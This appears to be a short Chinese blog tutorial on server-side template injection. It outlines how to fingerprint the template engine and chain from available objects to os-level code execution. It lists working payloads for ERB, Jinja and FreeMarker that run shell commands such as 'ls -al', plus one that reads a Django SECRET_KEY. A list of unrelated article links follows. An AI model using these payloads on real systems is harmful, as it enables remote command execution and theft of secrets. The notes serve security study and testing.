Web攻防-SSTI服务端模版注入利用分类语言引擎数据渲染项目工具挖掘思路

1、确定模板引擎
先判断目标使用什么语言，在对比图片确定大致范围。
使用wappalyzer插件来辅助识别
白盒看pom.xml调用的模板引擎
2、构造payload的思路
寻找可用对象（比如字符串、字典，或者已给出的对象）
通过可用对象寻找原生对象（object）
利用原生对象实例化目标对象（比如os）
执行代码
3、如果手工有困难，可用使用Tqlmap或SSTImap代替

<%= exec 'ls -al' %>

blog-post-author-display=user.name}}{{7*7}}

blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('ls%20-al')

<#assign test="freemarker.template.utility.Execute"?new()> ${test("ls")}

{{settings.SECRET_KEY}} //获取key

相关文章：

Umi-OCR 的 Docker安装（win制作镜像，Linux（Ubuntu Server 22.04）离线部署）

数据集相关类代码回顾理解 | StratifiedShuffleSplit\transforms.ToTensor\Counter

数据结构-双链表

数字产品的专利战：要么布局称王，要么维权忙？

ABP VNext + Microsoft YARP：自定义反向代理与请求路由

文件上传漏洞1-文件上传漏洞详细原理讲解与利用方式

设计模式 - 面向对象原则：SOLID最佳实践

scrapy框架

源表=电源+数字表？一文看懂SMU源表 2025-04-14

大模型开发框架LangChain之函数调用

linux常用命令(一)

cnas实验室高效获证路径，cnas认证常见失败原因？

Linux711 Mysql

使用node调用jira接口

[精选]如何解决pip安装报错ModuleNotFoundError: No module named ‘subprocess’问题

linux系统-----Redis主从复制

生成对抗网络(GAN)原理详细讲解

MoE混合专家模型：千亿参数的高效推理引擎与架构革命

python文件操作与正则表达式综合练习

第三方渗透测试：范围咋定？需供应商同意吗？

【经典面经】C++新特性 TCP完整收发数据 TLS1.2 TLS1.3

低成本的AI知识库方案及推荐

计算机网络第三章(6)——数据链路层《网桥交换机》

【Python3教程】Python3高级篇之CGI编程

Windows系统下GroundingDINO的安装2025（踩无数坑）

Django母婴商城项目实践（三）

SpringBoot 使用注解获取配置文件中的值

揭示宇宙的隐藏对称性：群论-AI云计算拓展核心内容

加密狗真的坏了吗？CodeMeter 锁故障判定与质保指引

2025 年第十五届 APMCM 亚太地区大学生数学建模竞赛B题 疾病的预测与大数据分析